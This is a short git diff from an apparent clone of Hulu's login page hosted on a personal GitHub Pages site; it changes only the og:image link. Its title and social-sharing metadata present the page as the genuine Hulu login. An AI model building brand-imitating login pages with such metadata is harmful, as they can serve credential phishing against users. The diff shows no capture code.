Initial commit of Hulu project

--- a/Hulu.html
+++ b/Hulu.html
@@ -6,7 +6,7 @@
     <title>Hulu Login | Hulu</title>
     <meta property="og:title" content="Hulu Login Page">
     <meta property="og:description" content="Login to Hulu to watch your favorite shows!">
-    <meta property="og:image" content="https://github.com/Louise2003-gg/Hulu-Login-Hulu/blob/main/Hulu_Thumbnqail.png">
+    <meta property="og:image" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/Hulu_Thumbnqail.png">
     <meta property="og:url" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/Hulu.html">
     <meta property="og:type" content="website">
 
